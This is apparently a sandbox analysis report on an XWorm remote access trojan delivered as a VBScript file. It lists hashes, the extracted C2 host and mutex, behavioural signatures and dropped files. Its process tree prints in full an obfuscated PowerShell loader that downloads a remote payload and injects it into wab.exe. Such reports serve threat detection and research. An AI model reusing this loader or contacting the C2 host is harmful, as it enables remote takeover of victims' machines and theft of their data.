xworm | d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7

General

Target

windows.vbs
Size

72KB
MD5

828b53e8f1faed52722f7b7dd53c8c92
SHA1

f80c8f0bcb94ea38d10e239b203e4e990b649540
SHA256

d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7
SHA512

9273d55d7e193a3853b15dbc7d35cf545e00fb82428d22f554124cd74d694629fe775e626adcdc577d6961c8a86f9d2a57ea822f933533eff82a9a38c2420d87
SSDEEP

1536:xvv1gPn2+VbGSZ0way5Nv6/+sfoYNkvYX4+1pFlEixGvQ:x2PRVbnZB5M2s1+r+1rFGvQ

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

rachesxwdavid.duckdns.org:8895

Mutex

HS0J0ha2f3izEQny

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/848-131-0x0000000001060000-0x000000000106E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
5	2848	powershell.exe
7	2848	powershell.exe
9	2848	powershell.exe
12	2848	powershell.exe
14	2848	powershell.exe
16	2848	powershell.exe
18	2848	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

848 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1968 powershell.exe
848 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1968 set thread context of 848 1968 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2848 powershell.exe
1968 powershell.exe
1968 powershell.exe
848 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1968 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2848 powershell.exe
Token: SeDebugPrivilege 1968 powershell.exe
Token: SeDebugPrivilege 848 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

848 wab.exe

pid	process
848	wab.exe

pid	process
1968	powershell.exe
848	wab.exe

description	pid	process	target process
PID 1968 set thread context of 848	1968	powershell.exe	wab.exe

pid	process
2848	powershell.exe
1968	powershell.exe
1968	powershell.exe
848	wab.exe

pid	process
1968	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	848	wab.exe

pid	process
848	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2340 wrote to memory of 2848	2340	WScript.exe	powershell.exe
PID 2340 wrote to memory of 2848	2340	WScript.exe	powershell.exe
PID 2340 wrote to memory of 2848	2340	WScript.exe	powershell.exe
PID 2848 wrote to memory of 2532	2848	powershell.exe	cmd.exe
PID 2848 wrote to memory of 2532	2848	powershell.exe	cmd.exe
PID 2848 wrote to memory of 2532	2848	powershell.exe	cmd.exe
PID 2848 wrote to memory of 1968	2848	powershell.exe	powershell.exe
PID 2848 wrote to memory of 1968	2848	powershell.exe	powershell.exe
PID 2848 wrote to memory of 1968	2848	powershell.exe	powershell.exe
PID 2848 wrote to memory of 1968	2848	powershell.exe	powershell.exe
PID 1968 wrote to memory of 2712	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 2712	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 2712	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 2712	1968	powershell.exe	cmd.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe
PID 1968 wrote to memory of 848	1968	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
3⤵
PID:2532

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') ;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
4⤵
PID:2712

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:848

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
06efa836b0bb3aa69dfc76c3bd42adce

SHA1
54d5bc0a665dea0ba85d1bbfee836892aeb117a0

SHA256
a55af409b95ffdd5829bc43cd98270dc56ee806563ea31e944947b3b939feece

SHA512
82dee84e8474c62f1a5f856a107b52f9ffa0b4b689c8597121507e2ba683600da105eafd5ddae760837b2d2a081fca0ba74f350925067e9a1e89504065b70351

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7baa77e955c112235d8a285f48e49c1e

SHA1
f7e0d5284189cbee252b14253343a31766371d89

SHA256
eff57551367eb9f5e8b92eb81d90d002653cfff0d0c986912b755a8686dd443f

SHA512
20938debb0678de8bb5b19b3048e8eda340c03ddb9a04ea3b24de3c7d2d574959bdeacacc6479f6f16ab45a5fbeff6631bdb96cc645dd8c682d3c9d30210a1a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
8c15e31880e4598fea57ab8947a898e2

SHA1
4dc028057fe39743666ee1f7868390892c05f83c

SHA256
977d7fedbf6ff3d777de7a823ae5bc08603cf4e50d63b89ba9050e93abe1a3e2

SHA512
1f832de49a4002ad9849963a39e42e171d86e5e96c47e99722dc17d9549fdff5fabff30d82dacf5651a1c1424ec63a5bf2f629ad782e21b1236bc56158576fdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar31DF.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Briarberry.Mil
Filesize
438KB

MD5
81db82edae38bf944999451235d9e9c0

SHA1
2250f98c9bfc16d3a5ca9560cb3447aabe04a570

SHA256
e593978c513f1c50d0a811ad19022be63b110d3293c25f4693c820305d3cdea9

SHA512
c51eb0f644194599484e63f5dedcc180bee5ce64a79d7137e8e3413bea1bb30763438ceb8a8c663f7cd4908f1bfe6642036c6446876f3e078ff9caaa15645bce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\COY7Y8D9HUEHB43TD1UM.temp
Filesize
7KB

MD5
80d1d8b83acb990e9572b76c9f23f7e3

SHA1
cc00d624cbf74b0b261dd8551f3f88a5f818a496

SHA256
68a4b32dfb10286339b7a2ec09232d835075b2aa4d6527e9a16c538e2c16aa99

SHA512
cd5f9df4ffe06aaa933bc3e9becce49de0044f2c3fde599569e470486291b5953491af4a4285d1bfc9ed031c0fa5f40772efda1053b525c21751915060ff2df6

Download Submit
memory/848-131-0x0000000001060000-0x000000000106E000-memory.dmp

Filesize
56KB

Download
memory/848-129-0x0000000001060000-0x00000000020C2000-memory.dmp

Filesize
16.4MB

Download
memory/1968-97-0x0000000006810000-0x0000000008B86000-memory.dmp

Filesize
35.5MB

Download
memory/2848-9-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
memory/2848-10-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
memory/2848-4-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

Filesize
4KB

Download
memory/2848-8-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
